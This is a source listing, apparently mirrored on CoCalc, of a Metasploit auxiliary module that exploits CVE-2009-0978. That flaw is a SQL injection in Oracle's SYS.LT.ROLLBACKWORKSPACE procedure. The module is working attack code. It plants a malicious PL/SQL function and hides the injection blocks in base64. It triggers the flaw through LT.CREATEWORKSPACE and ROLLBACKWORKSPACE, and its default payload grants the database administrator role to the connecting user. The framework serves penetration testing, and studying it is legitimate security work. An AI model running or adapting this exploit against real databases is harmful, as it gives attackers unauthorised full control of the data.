Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE',

14
        'Description' => %q{

15
          This module exploits a sql injection flaw in the ROLLBACKWORKSPACE

16
          procedure of the PL/SQL package SYS.LT. Any user with execute

17
          privilege on the vulnerable package can exploit this vulnerability.

18
        },

19
        'Author' => [ 'MC' ],

20
        'License' => MSF_LICENSE,

21
        'References' => [

22
          [ 'CVE', '2009-0978' ],

23
          [ 'OSVDB', '53734'],

24
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html' ],

25
        ],

26
        'DisclosureDate' => '2009-05-04',

27
        'Notes' => {

28
          'Stability' => [CRASH_SAFE],

29
          'SideEffects' => [IOC_IN_LOGS],

30
          'Reliability' => []

31
        }

32
      )

33
    )

34


35
    register_options(

36
      [

37
        OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),

38
      ]

39
    )

40
  end

41


42
  def run

43
    return if !check_dependencies

44


45
    name = Rex::Text.rand_text_alpha_upper(1..10)

46
    rand1 = Rex::Text.rand_text_alpha_upper(1..10)

47
    rand2 = Rex::Text.rand_text_alpha_upper(1..10)

48
    rand3 = Rex::Text.rand_text_alpha_upper(1..10)

49
    cruft = Rex::Text.rand_text_alpha_upper(1..5)

50


51
    function = "

52
      CREATE OR REPLACE FUNCTION #{cruft}

53
      RETURN VARCHAR2 AUTHID CURRENT_USER

54
      AS

55
      PRAGMA AUTONOMOUS_TRANSACTION;

56
      BEGIN

57
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

58
      COMMIT;

59
      RETURN '#{cruft}';

60
      END;"

61


62
    package1 = %|

63
      BEGIN

64
        SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

65
      END;

66
      |

67


68
    package2 = %|

69
      BEGIN

70
        SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

71
      END;

72
      |

73


74
    uno = Rex::Text.encode_base64(function)

75
    dos = Rex::Text.encode_base64(package1)

76
    tres = Rex::Text.encode_base64(package2)

77


78
    sql = %|

79
      DECLARE

80
      #{rand1} VARCHAR2(32767);

81
      #{rand2} VARCHAR2(32767);

82
      #{rand3} VARCHAR2(32767);

83
      BEGIN

84
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

85
      EXECUTE IMMEDIATE #{rand1};

86
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

87
      EXECUTE IMMEDIATE #{rand2};

88
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));

89
      EXECUTE IMMEDIATE #{rand3};

90
      END;

91
      |

92


93
    clean = "DROP FUNCTION #{cruft}"

94


95
    print_status('Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...')

96
    prepare_exec(sql)

97
    print_status("Removing function '#{cruft}'...")

98
    prepare_exec(clean)

99
  end

100
end

101


102